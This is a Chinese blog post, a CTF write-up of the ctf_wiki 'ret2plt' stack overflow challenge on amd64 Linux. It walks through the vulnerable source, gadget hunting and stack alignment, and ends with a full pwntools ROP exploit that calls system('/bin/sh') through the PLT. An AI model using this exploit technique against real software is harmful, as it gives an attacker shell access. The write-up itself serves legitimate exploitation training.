【pwn-栈溢出】— ret2plt

已于 2023-03-24 18:08:26 修改
阅读量247 收藏
点赞数 1
文章标签: 网络安全
于 2023-03-19 15:35:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43988488/article/details/129651513
版权

ret2plt

0x1、程序信息

描述内容
程序名称ret2plt
程序平台linux
程序来源ctf_wiki
CPU架构amd64
libc版本2.31
利用手法ret2plt
系统版本Ubuntu 20.04 LTS
下载地址https://wwnd.lanzoue.com/ig40I0qem4li

0x2、检测保护

1.使用checksec检测到程序开启了NX保护,堆、栈、BSS段不可执行


0x3、静态分析

1.直接看实验中给出的源码ret2plt.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char name[16];

int main()
{
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 2, 0);
  char buf[16];
  system("echo What is your name?");
  read(0, name, 0x10);
  puts("Say something: ");
  read(0, buf, 0x40);
  return 0;
}

2.程序流程分析

  • 第1次接收0x10个字节的输入存到全局变量name
  • 第2将接收0x40个字节的输入存到局部变量buf里,但buf只有16字节,所以会产生栈溢出

3.利用思路

  • 第1次输入时将'/bin/sh'字符串写到全局变量name
  • 第2次输入时通过构造好的gadget写到buf中去调用执行system

0x4、ROP chain设计

1.Rop chain设计图解

2.在栈中填入ROP链接和system的plt所需的参数,利用系统调用getshell。

0x5、收集gadget片段

1.使用ROPgadget加上egrep命令过滤出pop rdi ; ret

ret2plt ROPgadget --binary ret2plt |egrep "rdi"

2.查看全局变量name的地址

objdump -d -M intel ret2plt |grep name

3.查找ret地址


疑问:为什么要加这个ret指令?

  • 执行system时,里面会用到xmm的寄存器,该寄存器为128位,就要求stack0x10对齐
  • 如果stack是0x08这样8字节对齐时,运行到movaps xmmword ptr [rsp + 0x50] 时就无法通过,并抛出异常,增加这条ret语句就是为了栈对齐。

4.查找system@plt地址

0x6、编写利用脚本

1.完整exp脚本

#!/usr/bin/python3 
from pwn import *

io = process('./ret2plt')
elf = ELF('./ret2plt')
ret_addr = 0x4004fe
pop_rdi = 0x400733
sh_addr = elf.symbols['name']
system_plt = elf.plt['system']

io.sendlineafter('name?',b'/bin/sh\x00')
payload = flat([b'a'*0x18,p64(pop_rdi),p64(sh_addr),p64(ret_addr),p64(system_plt)])
io.sendlineafter(": ",payload)
io.interactive()

2.脚本运行时的堆栈图

0x7、参考引用

使用ret2plt绕过libc安全区_海枫的博客-CSDN博客

战队官网:https://www.edisec.net/

战队CTF靶场:https://ctf.edisec.net/#/index

战队新社区:https://bbs.edisec.net

小朋友呢
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
使用ret2plt绕过libc安全区
海枫的专栏
08-11 8684
使用ret2plt绕过libc安全区
pwn05(应对简单溢出的常规套路)
Welcome To Myon'Blog !
07-07 423
一、常规检查(nc、file、checksec) 二、IDA反编译,只找两个东西即可 1、寻找造成溢出的函数的地址到ebp的距离 2、寻找我们所要利用的函数的地址(即我们希望程序最后返回到哪里) 三、编写并运行exp脚本
BugkuCTF pwn overflow
ChaoYue_miku的博客
07-02 1598
** 0、在Linux中打开文件,使用file命令查看文件类型,使用checksec检查保护情况 ** 64位文件,未开启任何保护,尝试运行一下 ** 1、使用IDA 64 Pro打开文件 ** 查看主函数 存在溢出漏洞 ** 2、寻找后门函数 ** 存在一个get_shell函数,地址为0x400751 ** 3、构造exp ** from pwn import * #io = process('./pwn2') io = remote("114.67.246.176", 15587)
2022西湖论剑pwn部分wp
N1rvana的博客
02-05 798
西湖论剑2022pwn
BugkuCTF-PWN题pwn2-overflow超详细讲解
am_03的博客
08-30 1897
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到里,保存的顺序是从右往左入。比如abcdef会存入到寄存器里,然后一次入h
pwn07.ret2syscall例题
11-11
ret2syscall例题
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
pwn溢出10道练习题有writeup
01-04
pwn溢出练习题目,每题都有writeup.
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
pwn-溢出】— ret2text
weixin_43988488的博客
03-19 522
使用checksec检查程序的架构以及保护情况寻找程序漏洞函数,比如如gets,scanf等计算目标变量的在堆中与底(32:ebp,64:rbp)的之间偏移查看程序导入表,观察表中是否已导入可利用的函数,比如system,execve等分析是否有字符串/bin/sh,将它作为system的参数在此程序中,它直接提供一个后门函数,供我们使用。
bugku-pwn2
ro4lsc的博客
05-31 548
pwn2 首先我对pwn题完全没有了解,真萌新,所以就刷刷最基础的题目吧。 我是使用了pwndocker,第一次用没啥感觉。 docker exec -it mypwn /bin/bash wget https://ctf.bugku.com/files/ad67ac41b68c70c40d90bce4a39796e4/pwn2 checksec pwn2 这个东西我暂时看不懂,只知道这个pwn2是个64位程序 用IDA打开,找到main函数F5 int __cdecl main(int argc,
BugKu做题记录【pwn】(持续更新中)
Assassin
04-06 3053
文章目录repeater1.题目分析2.我的错误思路3.正确思路4.利用代码5.知识点总结 好久不做题了,刚刚开始的签到题就做了三天,感觉水平确实下降得太厉害了,恢复训练~ ** ** repeater 1.题目分析 题目逻辑非常简单,就是read函数输入内容,然后printf输出,经过观察和简单得调试,我们需要注意到几个内容 pinrtf存在格式化字符串漏洞 read长度为0x64,不足以造成溢出 经过权限查询发现开启了NX保护,RELRO是部分开启,也就是堆不可执行 经过查看,bss段不可执
pwn入门小技巧
qq_36918532的博客
05-24 2588
目前我所遇到的一些pwn的做题技巧 我也是偶尔玩玩ctf,所以也不会很难的,所以这篇主要是帮助刚开始学习的人学习吧 首先知识点包括:,堆,整数溢出,格式化字符串 目前ctf的题越来越偏向于实际,有的会使用刚刚爆出来的CVE漏洞的,所以不能只局限于glibc 所以可以大体分为两类把:libc,kernel 利用:有ret2libc,ret2shellcode,ret2text,ropchain,ret2syscall,brop,srop等等,当然有时候还会有seccomp的只能使用ORW系统调用 堆利用:
内存安全试验:ret2libc绕过DEP另一个例子
weixin_42072280的博客
05-09 684
关于ret2libc的实验原理见我的另一篇博客:https://mp.csdn.net/postedit/89948519 这是ret2libc的又一个例子 这个例子和之前的那个例子区别主要是:之前的那个例子漏洞程序和攻击程序是分开的,而这个实验是在一个程序里面实现的。 虽然看似比之前的那个简单,但是还是遇到了很多问题,现一一记录下来,供自己查阅,也供他人学习。 ...
ProcExp的利用
被遗弃的庸才博客
09-30 3550
事件的起因是这篇,简单来说就是ark工具能够打开和复制system的句柄,其中\Device\PhysicalMemory的句柄可以映射到当前进程,从而直接操作物理地址。
链接装载与库:第三章——ELF文件结构
yelvens的博客
05-19 2218
一、目标文件的格式 目标文件就是源代码编译后但未进行链接的那些中间文件(Windows的.obj和Linux的.o),它跟可执行文件的内容与结构很相似,所以一般跟可执行文件格式一起采用一种格式存储。从广义上看,目标文件与可执行文件的格式其实几乎是一样的,所以我们可以广义地将目标文件与可执行文件看成是一种类型的文件。在Windows下,它们存储格式是PE-COFF文件格式。在Linux下,它们存储格式是ELF文件格式。 Linux下符合ELF格式的文件主要有四种:可重定位文件、可执行文件、共享目标文件、核心转
movaps xmmword指令
qq_41490873的博客
03-22 3041
movups xmm0, xmmword ptr[rax] movaps xmmword ptr[rsp + 50h], xmm0 movups xmm1, xmmword ptr[rax + 10h] movaps xmmword ptr[rsp + 60h], xmm1 movups xmm0, xmmword ptr[rax + 20h] movaps xmmword ptr[rsp + 70h], xmm0 movups xmm1, xmmword ptr[rax + 3.
sse 指令xmm寄存器和内存互相复制的问题
justin_bkdrong的专栏
01-09 4696
下面是一段可以执行的x64 的 nasm 汇编代码,类似可执行文件的外壳代码 bits 64 global start extern MessageBoxA section .text start: push rbp push rax push rbx push rcx push rdx push rsi push rdi pu
pwn+溢出解题思路
最新发布
11-10
pwn是一种利用溢出漏洞的攻击方式,通常用于CTF比赛中。下面是一些pwn解题思路的步骤: 1. 找到漏洞:首先需要找到程序中的漏洞,通常是溢出漏洞或格式化字符串漏洞。 2. 利用漏洞:利用漏洞来执行恶意代码,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小朋友呢

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值